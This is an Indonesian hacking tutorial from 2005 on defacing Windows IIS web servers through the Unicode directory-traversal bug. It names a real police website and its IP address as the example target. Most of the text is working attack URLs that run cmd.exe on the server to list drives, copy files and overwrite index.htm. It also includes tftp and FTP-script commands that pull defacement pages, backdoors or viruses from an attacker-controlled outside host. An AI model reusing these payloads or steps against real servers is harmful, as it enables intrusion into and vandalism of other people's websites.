� Back

� WWW.SPYROZONE.TK �

 

[084]. Tutorial Deface Unicode-OS Target : Windows NT/9x/2000

    

  

------------------------------------------------------

Author  : Janngkr|k

Contact : -

CopyLEFT (c) 2006 www.spyrozone.tk All Rights Reserved

� 15/09/2005  17:20:16 WIB

------------------------------------------------------

 

Ini Hendaknya Dijadikan Bahan Percobaan untuk Belajar

1. Kita Harus menentukan WebSite Target/Sasaran Kita : contoh : www.polri.go.id : 

2. Login Ini Merupakan Directory yang Ada Di WebSite Tersebut
Directory Ini Di Konfigurasi dengan Script tertentu Supaya file dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa menembus web ini. Ada beberapa contoh login diantaranya :
a)/_vti_bin
b)/_vti_cnf 
c)/cgi-bin
d)/scripts
e)/msadc 

3. Unicode ===> Merupakan code yang dapat membaca script konfigurasi website tersebut code ini yang dapat membaca bug cgi nya. hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c.. 
b) ..%c0%9v.. 
c) ..%c0%af.. 
d) ..%c0%qf.. 
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..

4. OS Target ===> ini Menyatakan Sertificate Web OS kita WinNT dan Win98
0xB5 ISO 8859-1 
0xC5 ISO 8859-1 
0xEA CP437 
0x2140 JIS X 0208 
0x22 ISO 8859-1

5. Cara Kerja 
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :

A.) Deface WebSite dengan Command " Echo "
==========================================

(1) Secara umum :

http://target/login/unicode/os/system/c+dir atau http://www.polri.go.id/login/unicode/os/system/c+dir

http://202.155.24.200/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu. Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya command dir yang kita lakukan di Dos Prompt.

Directory of c:\
10/05/2001 19:56 <DIR> Programs Files
10/05/2001 19:56 <DIR> Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 <DIR> AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm

(2) Setelah berhasil lihat List Hardisk Kita Harus cari "Path_Translade" web nya dengan menggunakan command : " /c+dir+c:\ " di ubah menjadi " /c+set "

http://202.155.24.200/cgi_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/winnt/system32/cmd.exe?/c+dir+c:\ menjadi http://202.155.24.200/cgi_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/winnt/

system32/cmd.exe?/c+set.

" /c+dir+c:\ " di ubah menjadi " /c+set "

http://202.155.24.200/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+set

Maka Akan keluar "CGI error" yang isinya menyatakan "Configurasi Batch Sytem WebServer" tersebut
Keluar Macam - Macam File, Yang Perlu dilihat cuma : 

Path_Translade=d:\wwwpolri

(3) Langkah Selanjutnya Adalah Copy file " cmd.exe " dengan nama baru, misal " cmd1.exe " atau nama anda contoh " jangkrik.exe " dengan mengganti " /c+dir+c:\ " menjadi " /c+copy+c:\ ".

lalu tambahkan dengan : winnt\system32\cmd.exe+c:\jangkrik.exe

Sehingga kita dapatkan 

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/

c+copy+c:\winnt\system32\cmd.exe+c:\jangkrik.exe

Sekarang Anda bisa melihat file " cmd1.exe " sudah ada di direktori :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\


Tujuan Ini Sebenarnya untuk menyingkat command pada addres IE kita.


(4) Kemudian Cari halaman index ke www.target.com/blah.ida

Kadang-kadang ekstensi " .ida " yang tidak diketahui akan merespon lokal path. Kalo trik " .ida " tidak bekerja, coba gunakan direktori " InetPub " :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\wwwroot\

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\

wwwroot\index.htm

(5) Setelah tau dimana letak file " index.htm" nya dengan kata lain folder webnya. Sebaiknya, kita backup dulu "index.htm ", dengan cara :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:\inetpub\

wwwroot\index.htm+c:\inetpub\wwwroot\index.htm.bak <=== file backup

(6) Baru Kita deface atau kita echo Halaman Depannya dengan command dibawah ini :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?

/c+echo+You%20Were%20Hacked+>+c:\inetpub\wwwroot\index.htm

Supaya tidak merusak web nya kita tulis dengan nama file baru : 

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?

/c+echo+You%20Were%20Hacked+>+c:\inetpub\wwwroot\jangkrik.htm

/c+echo+You%20Were%20Hacked+>+c:\ ===> adalah untuk menuliskan kata-kata "You Were Hacked" pada

" c:\inetpub\wwwroot\index.htm " file yang ditulis atau c:\inetpub\wwwroot\jangkrik.htm file yang ditulis. 

Untuk Anda yang telah Paham Bahasa HTML Kalau pengen Hasil Defacenya keren Gunakan command ini :

/c+echo"<html><head><title>..::Website Has Been Deface BY Jangkr|k:..</title><body Bgcolor%3dBlack Text%3dRed><center>This Website Deface BY <marquee bgcolor%3dWhite Text%3dred><b>....:::J.A.N.G.K.|.K:...</b></marquee><br>Thanks To People On Irc.Dal.net %23MinangCrew And %23PadangHack<br><img src%3D%22http://gaibsetan.f2g.net/hacking.jpg%22></body></html>"+>+c:\inepub\

wwwroot\index.htm

/c+echo"<html><head><title>..::Website Has Been Deface BY Jangkr|k:..</title><body Bgcolor%3dBlack Text%3dRed><center>This Website Deface BY <marquee bgcolor%3dWhite Text%3dred><b>....:::J.A.N.G.K.|.K:...</b></marquee><br>Thanks To People On Irc.Dal.net %23MinangCrew And %23PadangHack<br><img src%3D%22http://gaibsetan.f2g.net/hacking.jpg%22></body></html>"+>+

c:\inepub\wwwroot\jangkrik.htm

: Keterangan :
%3d adalah pernyataan tanda = 
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #

(7) Langkah terakhir untuk melihat hasilnya untuk Membaca file yang lain dengan menggunakan perintah 'type' :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:\inetpub\

wwwroot\index.htm

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:\inetpub\

wwwroot\jangkrik.htm

Untuk lebih jelasnya langsung saja : http://www.polri.go.id/ atau www.polri.go.id/jangkrik.htm

Jika Anda menemukan webserver dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:

B.) Deface WebSite Dengan Cara " tftp "
==========================================

Deface nya dilakukan dengan meng-upload file lewat TFTP32 
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik keyword nya TFTP32.

Mari kita mulai meng-uploadnya. Perintahnya sesuai langkah berikut ini :

(1) Kita Lakukan dengan Langkah, pada deface dengan " echo " untuk mencari vulnerable-nya
sehingga kita mendapatkan hole/scriptnya.

http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/

Langkah selanjutnya adalah meng-uploadnya lagi. Namun Sebelumnya kita sudah menyiapkan File htmlnya untuk halaman web defacenya.

(2) Setelah semua siap baru kita upload dengan command seperti berikut :

http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm (file yg mau anda up-load)+ C:\InetPub\wwwroot\main.html

(3) Kita lihat apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Selamat Anda telah berhasil meng-upload file Anda memakai "Sofware TFTP32" tadi silahkan buka web site target tadi. Kekurangannya dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadi, Jika itu terjadi maka gunakanlah cara yang pertama tadi, yaitu dengan command "echo".

C.) Dengan Cara Ftp dengan Web Kita yang telah Kita Isi Dengan Bahan Deface 

Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor, virus atau program lainnya.

Selanjutnya kita lakukan Sama dengan Cara diatas. Setelah Anda tau hole cgi-bug or unicodenya maka Anda lakukah-langkah berikut ini:

a.) Setelah kita menemukan vulnernya 
http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:\ 
Directory of c:\
10/05/2001 19:56 <DIR> Programs Files
10/05/2001 19:56 <DIR> Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 <DIR> AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm 
b.) Lalu kita lakukan langkah copy, seperti langkah diatas

c.) Lalu Kita Lihat +set nya untuk melihat patch translade nya 
http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set

Kiranya path-nya ada di c:\inetpub\wwwroot\

d.) Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:\inetpub\wwwroot\+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:\inetpub\wwwroot\jangkrik.ftp

Setelah Scrip jangkrik.ftp selesai di liat lagi script-nya apa benar 
http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:\inetpub\wwwroot\jangkrik.ftp

Setelah selesai scriptnya kita jalankan lagi script nya:

http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:\inetpub\wwwroot\jangkrik.ftp

Buka IE satulagi untuk melihat filenya kira-kira sudah ada belum

http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot\

Kalau sudah terkirim selamat dah :)


: Keterangan nya :
==================
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:\inetpub\wwwroot\jangkrik.ftp 
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:\inetpub\wwwroot\jangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:\inetpub\wwwroot\jangkrik.ftp
lcd c:\inetpub\wwwroot\ --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:\inetpub\wwwroot\+>>+c:\inetpub\wwwroot\jangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:\inetpub\wwwroot\jangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:\inetpub\wwwroot\jangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:\inetpub\wwwroot\jangkrik.ftp

==================================================

NB: 

- Scanner IIS bisa didownload di member area of Spyro Zone.

- Buat mas Janngkr|k, segera hubungi Spyro dunk... penting banget neeh.. :)

  

/* ------------------------------|EOF|------------------------------ */

 

   � Back

� WWW.SPYROZONE.TK �